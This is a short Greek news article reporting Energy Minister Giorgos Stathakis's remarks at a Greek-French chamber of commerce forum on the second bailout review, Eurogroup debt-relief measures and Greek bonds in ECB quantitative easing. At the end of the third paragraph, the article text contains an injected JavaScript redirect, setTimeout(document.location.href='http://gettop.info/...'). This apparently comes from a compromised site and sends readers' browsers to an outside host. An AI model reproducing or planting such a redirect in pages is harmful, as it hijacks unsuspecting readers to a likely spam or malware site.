Σταθάκης: Μετά το Eurogroup η συζήτηση για τις μεσοπρόθεσμες παρεμβάσεις

0
11

 

Στο φόρουμ επί θεμάτων ενέργειας, περιβάλλοντος, επιχειρηματικότητας και καινοτομίας που διοργάνωσε το ελληνογαλλικό εμπορικό και βιομηχανικό επιμελητήριο μίλησε ο υπουργός Περιβάλλοντος και ενέργειας Γιώργος Σταθάκης σημειώνοντας πως «ιδιαίτερα καθοριστική και σημαντική είναι η ομαλή ολοκλήρωση της δεύτερης αξιολόγησης και η υλοποίηση των συμφωνηθέντων του πλαισίου για το χρέος. Η ελληνική πλευρά από την πλευρά της είναι βέβαιο ότι θα συνεχίσει να εφαρμόζει το πλαίσιο συμφωνίας και να προωθεί εκείνες τις παρεμβάσεις και μεταρρυθμίσεις που έχει ανάγκη η οικονομία».

Ο υπουργός επεσήμανε ότι «το προσεχές διάστημα αναμένεται να ξεκινήσει η εφαρμογή όσων συμφωνήθηκαν στο Eurogroup του Μαΐου για την ελάφρυνση του ελληνικού δημόσιου χρέους. Στο Eurogroup της 5ης Δεκεμβρίου αναμένεται να συζητηθεί η άμεση υλοποίηση των βραχυπρόθεσμων παρεμβάσεων και θα ξεκινήσει η συζήτηση για τις μεσοπρόθεσμες παρεμβάσεις. Θα ανοίξει έτσι ο δρόμος για την ΕΚΤ για τις δυνατότητες πλήρους ομαλοποίησης στις αγορές των ελληνικών ομολόγων στο πλαίσιο της ποσοτικής χαλάρωσης»

Όπως συμπλήρωσε: «Η πορεία ανάκαμψης της οικονομίας αναμένεται να υποστηριχθεί και να ενδυναμωθεί μέσω της εισροής επενδυτικών πόρων και μέσω του ΠΔΕ, της βελτίωσης συνθηκών ρευστότητας στο τραπεζικό σύστημα και της περαιτέρω αποκατάστασης του κλίματος εμπιστοσύνης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here